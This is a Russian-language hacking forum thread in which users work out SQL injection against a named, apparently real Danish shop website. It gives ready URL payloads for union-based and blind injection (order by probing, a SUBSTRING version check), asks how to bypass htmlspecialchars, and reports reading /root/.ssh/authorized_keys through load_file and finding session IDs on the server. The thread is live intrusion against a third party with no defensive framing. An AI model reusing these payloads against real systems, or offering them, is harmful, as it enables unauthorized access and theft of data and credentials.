Там есть иньекция, но перебирать придется вслепую, так как там сложный запрос с left join, фильтр там /*

http://www.viper-shop.dk/category.php?id=180%27+union+select+1/*

потому что если подставить

http://www.viper-shop.dk/category.php?id=180%27+union+select+1--

то совсем другой рез-т. Т.е. с этой ссылкой надо поработать как с Blind SQL-inj

gisTy
читай мой пост! если скажешь что это не иньекция, то я сьем свой тапок!
http://www.viper-shop.dk/category.php?id=180'+order+by+15/*
и
http://www.viper-shop.dk/category.php?id=180'+order+by+16/*

-------------
как сказал Pashkela, тут слепая иньекция, да ещё и 4ая ветка
http://www.viper-shop.dk/category.php?id=180'+AND+SUBSTRING((select+version ()),1,1)='4
тк кк Access denied for user 'viper-shopdk'@'%' to database 'mysql' то тут надо перебирать таблы .. мне лень, еси кому то интересно - удачи ))

сори.. это я ступил малость..

Не могу окончательно понять понять что означает:
Пример:
union+select+1,3,4,5,6,7,8,9/*
union+select-(Выбрать из базы)
А что означают 1,2,3,4,5,6,7,8,9 Поля в таблице?

geforce, иди почитай
https://forum.antichat.ru/thread43966.html

Я уже милион раз читал это! Мне нуген ответ на вопрос

Вот запрос к базе пример:

когда я пишу union select 1,2,3,4,5,6,7,8,9 какую роль играют эти цыфры?

И вопрос:

Существует ли способ обойти функцыю htmlspecialchars(); если да то как?

2 geforce
значит прочитай ещё раз ..
там всё написано .. если сам поймёшь - значит действительно поймёшь .. а так, забудешь - на завтра.

Еще это следует почитать http://www.ipmce.su/~lib/osn_prav.html#0008

При чтении load_file-ом нашёл публичные ключи в ./root/.ssh/authorized_keys:

bЃ .authorized_keys.nV0WVg bЃ И
authorized_keys

Справа отчётливо имя файла authorized_keys,а слева что за херня ? Юзал SIPT 4.0

Система - FreeBSD

И ещё: кучу всякого в var/tmp валяется,включая идентификаторы сессий.

mysql-5.tgz к примеру.